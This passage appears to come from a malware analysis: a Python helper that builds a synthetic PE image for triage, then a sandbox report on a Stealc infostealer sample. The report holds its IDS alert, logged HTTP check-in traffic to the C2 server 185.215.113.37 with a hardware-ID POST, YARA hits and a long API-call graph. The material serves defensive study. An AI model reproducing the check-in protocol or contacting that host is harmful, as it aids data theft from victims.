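def build_sample_pe() -> bytes:
    """Constructed PE32 image mirroring the report's section layout; not the analysed sample."""
    rwx = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    rw = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    high_entropy = bytes(range(256)) * 4                 # every byte value equally often: entropy 8.0
    layout = [                                           # (name, VA, virtual size, raw bytes, flags)
        (b"", 0x001000, 0x25B000, b"\0" * 0x200, rwx),
        (b".idata", 0x25D000, 0x001000, b"\0" * 0x200, rw),
        (b"vpiveclu", 0x500000, 0x19D000, high_entropy, rwx),
        (b".taggant", 0x69E000, 0x003000, b"\xE9" + b"\0" * 0x1FF, rwx),
    ]
    headers_len = 0x40 + 4 + 20 + 224 + 40 * len(layout)
    first_raw = (headers_len + 0x1FF) & ~0x1FF           # raw data starts on the next 512-byte boundary
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, 0x69E000)            # AddressOfEntryPoint, inside .taggant
    struct.pack_into("<I", opt, 28, 0x400000)            # ImageBase
    sec_hdrs, body = b"", b""
    for name, va, vsize, raw, flags in layout:
        sec_hdrs += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, va, len(raw), first_raw + len(body), 0, 0, 0, 0, flags)
        body += raw
    headers = dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_hdrs
    return headers.ljust(first_raw, b"\0") + body


if __name__ == "__main__":
    for finding in triage(build_sample_pe()):
        print(finding)
```

The thresholds (16x virtual-to-raw ratio, entropy above 7.0) are the example's own choices, not values from the report; on the synthetic image the script reports the .taggant entry point, the RWX flags, the empty section name, the mostly-virtual first section and the 8.0-entropy payload section, and stays silent on .idata.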
Suricata IDS Alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T17:41:16.620266+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49705 | 185.215.113.37 | 80 | TCP

TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 17:41:15.671010017 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
Sep 27, 2024 17:41:15.675862074 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.7
Sep 27, 2024 17:41:15.675949097 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
Sep 27, 2024 17:41:15.676738977 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
Sep 27, 2024 17:41:15.681847095 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.7
Sep 27, 2024 17:41:16.380487919 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.7
Sep 27, 2024 17:41:16.380553961 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
Sep 27, 2024 17:41:16.385123014 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
Sep 27, 2024 17:41:16.390222073 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.7
Sep 27, 2024 17:41:16.620198011 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.7
Sep 27, 2024 17:41:16.620265961 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
Sep 27, 2024 17:41:20.289582968 CEST | 49705 | 80 | 192.168.2.7 | 185.215.113.37
HTTP Request Dependency Graph
• 185.215.113.37

HTTP Sessions
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49705 | 185.215.113.37 | 80 | 6952 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:41:15.676738977 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Sep 27, 2024 17:41:16.380487919 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:41:16 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Sep 27, 2024 17:41:16.385123014 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 30 44 33 35 30 41 33 30 31 44 33 36 36 33 38 31 32 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------BFCFBKKKFHCFHJKFIIEH
Content-Disposition: form-data; name="hwid"

4B0D350A301D3663812181
------BFCFBKKKFHCFHJKFIIEH
Content-Disposition: form-data; name="build"

save
------BFCFBKKKFHCFHJKFIIEH--
Sep 27, 2024 17:41:16.620198011 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 15:41:16 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for the ASCII string "block")


Target ID: 0
Start time: 11:41:11
Start date: 27/09/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xca0000
File size: 1'847'808 bytes
MD5 hash: FE0680DFA4A95F3C9F5EFE7B68BEBDC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 9.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 24
lstrcpy 14675->14676 14677 ca15d9 14676->14677 14678 cba7a0 lstrcpy 14677->14678 14679 ca1663 14678->14679 14680 cb5510 14679->14680 14681 cb5521 14680->14681 14682 cba820 2 API calls 14681->14682 14683 cb552e 14682->14683 14684 cba820 2 API calls 14683->14684 14685 cb553b 14684->14685 14686 cba820 2 API calls 14685->14686 14687 cb5548 14686->14687 14688 cba740 lstrcpy 14687->14688 14689 cb5555 14688->14689 14690 cba740 lstrcpy 14689->14690 14691 cb5562 14690->14691 14692 cba740 lstrcpy 14691->14692 14693 cb556f 14692->14693 14694 cba740 lstrcpy 14693->14694 14734 cb557c 14694->14734 14695 cb51f0 20 API calls 14695->14734 14696 cba8a0 lstrcpy 14696->14734 14697 cb5643 StrCmpCA 14697->14734 14698 cb56a0 StrCmpCA 14700 cb57dc 14698->14700 14698->14734 14699 cba7a0 lstrcpy 14699->14734 14701 cba8a0 lstrcpy 14700->14701 14702 cb57e8 14701->14702 14703 cba820 2 API calls 14702->14703 14706 cb57f6 14703->14706 14704 cba740 lstrcpy 14704->14734 14705 cba820 lstrlen lstrcpy 14705->14734 14708 cba820 2 API calls 14706->14708 14707 cb5856 StrCmpCA 14709 cb5991 14707->14709 14707->14734 14711 cb5805 14708->14711 14710 cba8a0 lstrcpy 14709->14710 14712 cb599d 14710->14712 14713 ca1670 lstrcpy 14711->14713 14714 cba820 2 API calls 14712->14714 14731 cb5811 14713->14731 14716 cb59ab 14714->14716 14715 cb52c0 25 API calls 14715->14734 14718 cba820 2 API calls 14716->14718 14717 cb5a0b StrCmpCA 14719 cb5a28 14717->14719 14720 cb5a16 Sleep 14717->14720 14722 cb59ba 14718->14722 14721 cba8a0 lstrcpy 14719->14721 14720->14734 14723 cb5a34 14721->14723 14724 ca1670 lstrcpy 14722->14724 14725 cba820 2 API calls 14723->14725 14724->14731 14726 cb5a43 14725->14726 14727 cba820 2 API calls 14726->14727 14728 cb5a52 14727->14728 14730 ca1670 lstrcpy 14728->14730 14729 cb578a StrCmpCA 14729->14734 14730->14731 14731->13787 14732 ca1590 lstrcpy 14732->14734 14733 cb593f StrCmpCA 14733->14734 14734->14695 14734->14696 14734->14697 14734->14698 14734->14699 14734->14704 14734->14705 
14734->14707 14734->14715 14734->14717 14734->14729 14734->14732 14734->14733 14736 cb754c 14735->14736 14737 cb7553 GetVolumeInformationA 14735->14737 14736->14737 14738 cb7591 14737->14738 14739 cb75fc GetProcessHeap RtlAllocateHeap 14738->14739 14740 cb7619 14739->14740 14741 cb7628 wsprintfA 14739->14741 14743 cba740 lstrcpy 14740->14743 14742 cba740 lstrcpy 14741->14742 14744 cb5da7 14742->14744 14743->14744 14744->13808 14746 cba7a0 lstrcpy 14745->14746 14747 ca4899 14746->14747 15799 ca47b0 14747->15799 14749 ca48a5 14750 cba740 lstrcpy 14749->14750 14751 ca48d7 14750->14751 14752 cba740 lstrcpy 14751->14752 14753 ca48e4 14752->14753 14754 cba740 lstrcpy 14753->14754 14755 ca48f1 14754->14755 14756 cba740 lstrcpy 14755->14756 14757 ca48fe 14756->14757 14758 cba740 lstrcpy 14757->14758 14759 ca490b InternetOpenA StrCmpCA 14758->14759 14760 ca4944 14759->14760 14761 ca4ecb InternetCloseHandle 14760->14761 15805 cb8b60 14760->15805 14763 ca4ee8 14761->14763 15821 ca9ac0 CryptStringToBinaryA 14763->15821 14764 ca4963 15813 cba920 14764->15813 14768 ca4976 14769 cba8a0 lstrcpy 14768->14769 14774 ca497f 14769->14774 14770 cba820 2 API calls 14771 ca4f05 14770->14771 14772 cba9b0 4 API calls 14771->14772 14775 ca4f1b 14772->14775 14773 ca4f27 ctype 14777 cba7a0 lstrcpy 14773->14777 14778 cba9b0 4 API calls 14774->14778 14776 cba8a0 lstrcpy 14775->14776 14776->14773 14790 ca4f57 14777->14790 14779 ca49a9 14778->14779 14780 cba8a0 lstrcpy 14779->14780 14781 ca49b2 14780->14781 14782 cba9b0 4 API calls 14781->14782 14783 ca49d1 14782->14783 14784 cba8a0 lstrcpy 14783->14784 14785 ca49da 14784->14785 14786 cba920 3 API calls 14785->14786 14787 ca49f8 14786->14787 14788 cba8a0 lstrcpy 14787->14788 14789 ca4a01 14788->14789 14791 cba9b0 4 API calls 14789->14791 14790->13811 14792 ca4a20 14791->14792 14793 cba8a0 lstrcpy 14792->14793 14794 ca4a29 14793->14794 14795 cba9b0 4 API calls 14794->14795 14796 ca4a48 14795->14796 14797 cba8a0 lstrcpy 14796->14797 14798 ca4a51 
14797->14798 14799 cba9b0 4 API calls 14798->14799 14800 ca4a7d 14799->14800 14801 cba920 3 API calls 14800->14801 14802 ca4a84 14801->14802 14803 cba8a0 lstrcpy 14802->14803 14804 ca4a8d 14803->14804 14805 ca4aa3 InternetConnectA 14804->14805 14805->14761 14806 ca4ad3 HttpOpenRequestA 14805->14806 14808 ca4b28 14806->14808 14809 ca4ebe InternetCloseHandle 14806->14809 14810 cba9b0 4 API calls 14808->14810 14809->14761 14811 ca4b3c 14810->14811 14812 cba8a0 lstrcpy 14811->14812 14813 ca4b45 14812->14813 14814 cba920 3 API calls 14813->14814 14815 ca4b63 14814->14815 14816 cba8a0 lstrcpy 14815->14816 14817 ca4b6c 14816->14817 14818 cba9b0 4 API calls 14817->14818 14819 ca4b8b 14818->14819 14820 cba8a0 lstrcpy 14819->14820 14821 ca4b94 14820->14821 14822 cba9b0 4 API calls 14821->14822 14823 ca4bb5 14822->14823 14824 cba8a0 lstrcpy 14823->14824 14825 ca4bbe 14824->14825 14826 cba9b0 4 API calls 14825->14826 14827 ca4bde 14826->14827 14828 cba8a0 lstrcpy 14827->14828 14829 ca4be7 14828->14829 14830 cba9b0 4 API calls 14829->14830 14831 ca4c06 14830->14831 14832 cba8a0 lstrcpy 14831->14832 14833 ca4c0f 14832->14833 14834 cba920 3 API calls 14833->14834 14835 ca4c2d 14834->14835 14836 cba8a0 lstrcpy 14835->14836 14837 ca4c36 14836->14837 14838 cba9b0 4 API calls 14837->14838 14839 ca4c55 14838->14839 14840 cba8a0 lstrcpy 14839->14840 14841 ca4c5e 14840->14841 14842 cba9b0 4 API calls 14841->14842 14843 ca4c7d 14842->14843 14844 cba8a0 lstrcpy 14843->14844 14845 ca4c86 14844->14845 14846 cba920 3 API calls 14845->14846 14847 ca4ca4 14846->14847 14848 cba8a0 lstrcpy 14847->14848 14849 ca4cad 14848->14849 14850 cba9b0 4 API calls 14849->14850 14851 ca4ccc 14850->14851 14852 cba8a0 lstrcpy 14851->14852 14853 ca4cd5 14852->14853 14854 cba9b0 4 API calls 14853->14854 14855 ca4cf6 14854->14855 14856 cba8a0 lstrcpy 14855->14856 14857 ca4cff 14856->14857 14858 cba9b0 4 API calls 14857->14858 14859 ca4d1f 14858->14859 14860 cba8a0 lstrcpy 14859->14860 14861 ca4d28 14860->14861 
14862 cba9b0 4 API calls 14861->14862 14863 ca4d47 14862->14863 14864 cba8a0 lstrcpy 14863->14864 14865 ca4d50 14864->14865 14866 cba920 3 API calls 14865->14866 14867 ca4d6e 14866->14867 14868 cba8a0 lstrcpy 14867->14868 14869 ca4d77 14868->14869 14870 cba740 lstrcpy 14869->14870 14871 ca4d92 14870->14871 14872 cba920 3 API calls 14871->14872 14873 ca4db3 14872->14873 14874 cba920 3 API calls 14873->14874 14875 ca4dba 14874->14875 14876 cba8a0 lstrcpy 14875->14876 14877 ca4dc6 14876->14877 14878 ca4de7 lstrlen 14877->14878 14879 ca4dfa 14878->14879 14880 ca4e03 lstrlen 14879->14880 15819 cbaad0 14880->15819 14883 ca4e32 InternetReadFile 14884 ca4e67 InternetCloseHandle 14883->14884 14889 ca4e5e 14883->14889 14887 cba800 14884->14887 14886 cba9b0 4 API calls 14886->14889 14887->14809 14888 cba8a0 lstrcpy 14888->14889 14889->14883 14889->14884 14889->14886 14889->14888 14891 cbaad0 14890->14891 14892 cb17c4 StrCmpCA 14891->14892 14893 cb17cf ExitProcess 14892->14893 14894 cb17d7 14892->14894 14895 cb19c2 14894->14895 14896 cb18cf StrCmpCA 14894->14896 14897 cb18ad StrCmpCA 14894->14897 14898 cb187f StrCmpCA 14894->14898 14899 cb185d StrCmpCA 14894->14899 14900 cb1913 StrCmpCA 14894->14900 14901 cb1932 StrCmpCA 14894->14901 14902 cb18f1 StrCmpCA 14894->14902 14903 cb1951 StrCmpCA 14894->14903 14904 cb1970 StrCmpCA 14894->14904 14905 cba820 lstrlen lstrcpy 14894->14905 14895->13813 14896->14894 14897->14894 14898->14894 14899->14894 14900->14894 14901->14894 14902->14894 14903->14894 14904->14894 14905->14894 14907 cba7a0 lstrcpy 14906->14907 14908 ca5979 14907->14908 14909 ca47b0 2 API calls 14908->14909 14910 ca5985 14909->14910 14911 cba740 lstrcpy 14910->14911 14912 ca59ba 14911->14912 14913 cba740 lstrcpy 14912->14913 14914 ca59c7 14913->14914 14915 cba740 lstrcpy 14914->14915 14916 ca59d4 14915->14916 14917 cba740 lstrcpy 14916->14917 14918 ca59e1 14917->14918 14919 cba740 lstrcpy 14918->14919 14920 ca59ee InternetOpenA StrCmpCA 14919->14920 14921 ca5a1d 
14920->14921 14922 ca5fc3 InternetCloseHandle 14921->14922 14924 cb8b60 3 API calls 14921->14924 14923 ca5fe0 14922->14923 14927 ca9ac0 4 API calls 14923->14927 14925 ca5a3c 14924->14925 14926 cba920 3 API calls 14925->14926 14928 ca5a4f 14926->14928 14929 ca5fe6 14927->14929 14930 cba8a0 lstrcpy 14928->14930 14931 cba820 2 API calls 14929->14931 14933 ca601f ctype 14929->14933 14935 ca5a58 14930->14935 14932 ca5ffd 14931->14932 14934 cba9b0 4 API calls 14932->14934 14937 cba7a0 lstrcpy 14933->14937 14936 ca6013 14934->14936 14939 cba9b0 4 API calls 14935->14939 14938 cba8a0 lstrcpy 14936->14938 14947 ca604f 14937->14947 14938->14933 14940 ca5a82 14939->14940 14941 cba8a0 lstrcpy 14940->14941 14942 ca5a8b 14941->14942 14943 cba9b0 4 API calls 14942->14943 14944 ca5aaa 14943->14944 14945 cba8a0 lstrcpy 14944->14945 14946 ca5ab3 14945->14946 14948 cba920 3 API calls 14946->14948 14947->13819 14949 ca5ad1 14948->14949 14950 cba8a0 lstrcpy 14949->14950 14951 ca5ada 14950->14951 14952 cba9b0 4 API calls 14951->14952 14953 ca5af9 14952->14953 14954 cba8a0 lstrcpy 14953->14954 14955 ca5b02 14954->14955 14956 cba9b0 4 API calls 14955->14956 14957 ca5b21 14956->14957 14958 cba8a0 lstrcpy 14957->14958 14959 ca5b2a 14958->14959 14960 cba9b0 4 API calls 14959->14960 14961 ca5b56 14960->14961 14962 cba920 3 API calls 14961->14962 14963 ca5b5d 14962->14963 14964 cba8a0 lstrcpy 14963->14964 14965 ca5b66 14964->14965 14966 ca5b7c InternetConnectA 14965->14966 14966->14922 14967 ca5bac HttpOpenRequestA 14966->14967 14969 ca5c0b 14967->14969 14970 ca5fb6 InternetCloseHandle 14967->14970 14971 cba9b0 4 API calls 14969->14971 14970->14922 14972 ca5c1f 14971->14972 14973 cba8a0 lstrcpy 14972->14973 14974 ca5c28 14973->14974 14975 cba920 3 API calls 14974->14975 14976 ca5c46 14975->14976 14977 cba8a0 lstrcpy 14976->14977 14978 ca5c4f 14977->14978 14979 cba9b0 4 API calls 14978->14979 14980 ca5c6e 14979->14980 14981 cba8a0 lstrcpy 14980->14981 14982 ca5c77 14981->14982 14983 cba9b0 4 API 
calls 14982->14983 14984 ca5c98 14983->14984 14985 cba8a0 lstrcpy 14984->14985 14986 ca5ca1 14985->14986 14987 cba9b0 4 API calls 14986->14987 14988 ca5cc1 14987->14988 14989 cba8a0 lstrcpy 14988->14989 14990 ca5cca 14989->14990 14991 cba9b0 4 API calls 14990->14991 14992 ca5ce9 14991->14992 14993 cba8a0 lstrcpy 14992->14993 14994 ca5cf2 14993->14994 14995 cba920 3 API calls 14994->14995 14996 ca5d10 14995->14996 14997 cba8a0 lstrcpy 14996->14997 14998 ca5d19 14997->14998 14999 cba9b0 4 API calls 14998->14999 15000 ca5d38 14999->15000 15001 cba8a0 lstrcpy 15000->15001 15002 ca5d41 15001->15002 15003 cba9b0 4 API calls 15002->15003 15004 ca5d60 15003->15004 15005 cba8a0 lstrcpy 15004->15005 15006 ca5d69 15005->15006 15007 cba920 3 API calls 15006->15007 15008 ca5d87 15007->15008 15009 cba8a0 lstrcpy 15008->15009 15010 ca5d90 15009->15010 15011 cba9b0 4 API calls 15010->15011 15012 ca5daf 15011->15012 15013 cba8a0 lstrcpy 15012->15013 15014 ca5db8 15013->15014 15015 cba9b0 4 API calls 15014->15015 15016 ca5dd9 15015->15016 15017 cba8a0 lstrcpy 15016->15017 15018 ca5de2 15017->15018 15019 cba9b0 4 API calls 15018->15019 15020 ca5e02 15019->15020 15021 cba8a0 lstrcpy 15020->15021 15022 ca5e0b 15021->15022 15023 cba9b0 4 API calls 15022->15023 15024 ca5e2a 15023->15024 15025 cba8a0 lstrcpy 15024->15025 15026 ca5e33 15025->15026 15027 cba920 3 API calls 15026->15027 15028 ca5e54 15027->15028 15029 cba8a0 lstrcpy 15028->15029 15030 ca5e5d 15029->15030 15031 ca5e70 lstrlen 15030->15031 15032 cbaad0 15031->15032 15033 ca5e81 lstrlen GetProcessHeap RtlAllocateHeap 15032->15033 15034 cbaad0 15033->15034 15035 ca5eae lstrlen 15034->15035 15036 ca5ebe 15035->15036 15037 ca5ed7 lstrlen 15036->15037 15038 ca5ee7 15037->15038 15039 ca5ef0 lstrlen 15038->15039 15040 ca5f03 15039->15040 15041 ca5f1a lstrlen 15040->15041 15042 cbaad0 15041->15042 15043 ca5f2a HttpSendRequestA 15042->15043 15044 ca5f35 InternetReadFile 15043->15044 15045 ca5f6a InternetCloseHandle 15044->15045 15049 
ca5f61 15044->15049 15045->14970 15047 cba9b0 4 API calls 15047->15049 15048 cba8a0 lstrcpy 15048->15049 15049->15044 15049->15045 15049->15047 15049->15048 15052 cb1077 15050->15052 15051 cb1151 15051->13821 15052->15051 15053 cba820 lstrlen lstrcpy 15052->15053 15053->15052 15059 cb0db7 15054->15059 15055 cb0f17 15055->13829 15056 cb0e27 StrCmpCA 15056->15059 15057 cb0e67 StrCmpCA 15057->15059 15058 cb0ea4 StrCmpCA 15058->15059 15059->15055 15059->15056 15059->15057 15059->15058 15060 cba820 lstrlen lstrcpy 15059->15060 15060->15059 15065 cb0f67 15061->15065 15062 cb1044 15062->13837 15063 cb0fb2 StrCmpCA 15063->15065 15064 cba820 lstrlen lstrcpy 15064->15065 15065->15062 15065->15063 15065->15064 15067 cba740 lstrcpy 15066->15067 15068 cb1a26 15067->15068 15069 cba9b0 4 API calls 15068->15069 15070 cb1a37 15069->15070 15071 cba8a0 lstrcpy 15070->15071 15072 cb1a40 15071->15072 15073 cba9b0 4 API calls 15072->15073 15074 cb1a5b 15073->15074 15075 cba8a0 lstrcpy 15074->15075 15076 cb1a64 15075->15076 15077 cba9b0 4 API calls 15076->15077 15078 cb1a7d 15077->15078 15079 cba8a0 lstrcpy 15078->15079 15080 cb1a86 15079->15080 15081 cba9b0 4 API calls 15080->15081 15082 cb1aa1 15081->15082 15083 cba8a0 lstrcpy 15082->15083 15084 cb1aaa 15083->15084 15085 cba9b0 4 API calls 15084->15085 15086 cb1ac3 15085->15086 15087 cba8a0 lstrcpy 15086->15087 15088 cb1acc 15087->15088 15089 cba9b0 4 API calls 15088->15089 15090 cb1ae7 15089->15090 15091 cba8a0 lstrcpy 15090->15091 15092 cb1af0 15091->15092 15093 cba9b0 4 API calls 15092->15093 15094 cb1b09 15093->15094 15095 cba8a0 lstrcpy 15094->15095 15096 cb1b12 15095->15096 15097 cba9b0 4 API calls 15096->15097 15098 cb1b2d 15097->15098 15099 cba8a0 lstrcpy 15098->15099 15100 cb1b36 15099->15100 15101 cba9b0 4 API calls 15100->15101 15102 cb1b4f 15101->15102 15103 cba8a0 lstrcpy 15102->15103 15104 cb1b58 15103->15104 15105 cba9b0 4 API calls 15104->15105 15106 cb1b76 15105->15106 15107 cba8a0 lstrcpy 15106->15107 15108 cb1b7f 
15107->15108 15109 cb7500 6 API calls 15108->15109 15110 cb1b96 15109->15110 15111 cba920 3 API calls 15110->15111 15112 cb1ba9 15111->15112 15113 cba8a0 lstrcpy 15112->15113 15114 cb1bb2 15113->15114 15115 cba9b0 4 API calls 15114->15115 15116 cb1bdc 15115->15116 15117 cba8a0 lstrcpy 15116->15117 15118 cb1be5 15117->15118 15119 cba9b0 4 API calls 15118->15119 15120 cb1c05 15119->15120 15121 cba8a0 lstrcpy 15120->15121 15122 cb1c0e 15121->15122 15826 cb7690 GetProcessHeap RtlAllocateHeap 15122->15826 15125 cba9b0 4 API calls 15126 cb1c2e 15125->15126 15127 cba8a0 lstrcpy 15126->15127 15128 cb1c37 15127->15128 15129 cba9b0 4 API calls 15128->15129 15130 cb1c56 15129->15130 15131 cba8a0 lstrcpy 15130->15131 15132 cb1c5f 15131->15132 15133 cba9b0 4 API calls 15132->15133 15134 cb1c80 15133->15134 15135 cba8a0 lstrcpy 15134->15135 15136 cb1c89 15135->15136 15833 cb77c0 GetCurrentProcess IsWow64Process 15136->15833 15139 cba9b0 4 API calls 15140 cb1ca9 15139->15140 15141 cba8a0 lstrcpy 15140->15141 15142 cb1cb2 15141->15142 15143 cba9b0 4 API calls 15142->15143 15144 cb1cd1 15143->15144 15145 cba8a0 lstrcpy 15144->15145 15146 cb1cda 15145->15146 15147 cba9b0 4 API calls 15146->15147 15148 cb1cfb 15147->15148 15149 cba8a0 lstrcpy 15148->15149 15150 cb1d04 15149->15150 15151 cb7850 3 API calls 15150->15151 15152 cb1d14 15151->15152 15153 cba9b0 4 API calls 15152->15153 15154 cb1d24 15153->15154 15155 cba8a0 lstrcpy 15154->15155 15156 cb1d2d 15155->15156 15157 cba9b0 4 API calls 15156->15157 15158 cb1d4c 15157->15158 15159 cba8a0 lstrcpy 15158->15159 15160 cb1d55 15159->15160 15161 cba9b0 4 API calls 15160->15161 15162 cb1d75 15161->15162 15163 cba8a0 lstrcpy 15162->15163 15164 cb1d7e 15163->15164 15165 cb78e0 3 API calls 15164->15165 15166 cb1d8e 15165->15166 15167 cba9b0 4 API calls 15166->15167 15168 cb1d9e 15167->15168 15169 cba8a0 lstrcpy 15168->15169 15170 cb1da7 15169->15170 15171 cba9b0 4 API calls 15170->15171 15172 cb1dc6 15171->15172 15173 cba8a0 lstrcpy 
15172->15173 15174 cb1dcf 15173->15174 15175 cba9b0 4 API calls 15174->15175 15176 cb1df0 15175->15176 15177 cba8a0 lstrcpy 15176->15177 15178 cb1df9 15177->15178 15835 cb7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15178->15835 15181 cba9b0 4 API calls 15182 cb1e19 15181->15182 15183 cba8a0 lstrcpy 15182->15183 15184 cb1e22 15183->15184 15185 cba9b0 4 API calls 15184->15185 15186 cb1e41 15185->15186 15187 cba8a0 lstrcpy 15186->15187 15188 cb1e4a 15187->15188 15189 cba9b0 4 API calls 15188->15189 15190 cb1e6b 15189->15190 15191 cba8a0 lstrcpy 15190->15191 15192 cb1e74 15191->15192 15837 cb7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15192->15837 15195 cba9b0 4 API calls 15196 cb1e94 15195->15196 15197 cba8a0 lstrcpy 15196->15197 15198 cb1e9d 15197->15198 15199 cba9b0 4 API calls 15198->15199 15200 cb1ebc 15199->15200 15201 cba8a0 lstrcpy 15200->15201 15202 cb1ec5 15201->15202 15203 cba9b0 4 API calls 15202->15203 15204 cb1ee5 15203->15204 15205 cba8a0 lstrcpy 15204->15205 15206 cb1eee 15205->15206 15840 cb7b00 GetUserDefaultLocaleName 15206->15840 15209 cba9b0 4 API calls 15210 cb1f0e 15209->15210 15211 cba8a0 lstrcpy 15210->15211 15212 cb1f17 15211->15212 15213 cba9b0 4 API calls 15212->15213 15214 cb1f36 15213->15214 15215 cba8a0 lstrcpy 15214->15215 15216 cb1f3f 15215->15216 15217 cba9b0 4 API calls 15216->15217 15218 cb1f60 15217->15218 15219 cba8a0 lstrcpy 15218->15219 15220 cb1f69 15219->15220 15844 cb7b90 15220->15844 15222 cb1f80 15223 cba920 3 API calls 15222->15223 15224 cb1f93 15223->15224 15225 cba8a0 lstrcpy 15224->15225 15226 cb1f9c 15225->15226 15227 cba9b0 4 API calls 15226->15227 15228 cb1fc6 15227->15228 15229 cba8a0 lstrcpy 15228->15229 15230 cb1fcf 15229->15230 15231 cba9b0 4 API calls 15230->15231 15232 cb1fef 15231->15232 15233 cba8a0 lstrcpy 15232->15233 15234 cb1ff8 15233->15234 15856 cb7d80 GetSystemPowerStatus 15234->15856 15237 cba9b0 4 API calls 15238 cb2018 15237->15238 15239 cba8a0 lstrcpy 15238->15239 15240 
cb2021 15239->15240 15241 cba9b0 4 API calls 15240->15241 15242 cb2040 15241->15242 15243 cba8a0 lstrcpy 15242->15243 15244 cb2049 15243->15244 15245 cba9b0 4 API calls 15244->15245 15246 cb206a 15245->15246 15247 cba8a0 lstrcpy 15246->15247 15248 cb2073 15247->15248 15249 cb207e GetCurrentProcessId 15248->15249 15858 cb9470 OpenProcess 15249->15858 15252 cba920 3 API calls 15253 cb20a4 15252->15253 15254 cba8a0 lstrcpy 15253->15254 15255 cb20ad 15254->15255 15256 cba9b0 4 API calls 15255->15256 15257 cb20d7 15256->15257 15258 cba8a0 lstrcpy 15257->15258 15259 cb20e0 15258->15259 15260 cba9b0 4 API calls 15259->15260 15261 cb2100 15260->15261 15262 cba8a0 lstrcpy 15261->15262 15263 cb2109 15262->15263 15863 cb7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15263->15863 15266 cba9b0 4 API calls 15267 cb2129 15266->15267 15268 cba8a0 lstrcpy 15267->15268 15269 cb2132 15268->15269 15270 cba9b0 4 API calls 15269->15270 15271 cb2151 15270->15271 15272 cba8a0 lstrcpy 15271->15272 15273 cb215a 15272->15273 15274 cba9b0 4 API calls 15273->15274 15275 cb217b 15274->15275 15276 cba8a0 lstrcpy 15275->15276 15277 cb2184 15276->15277 15867 cb7f60 15277->15867 15280 cba9b0 4 API calls 15281 cb21a4 15280->15281 15282 cba8a0 lstrcpy 15281->15282 15283 cb21ad 15282->15283 15284 cba9b0 4 API calls 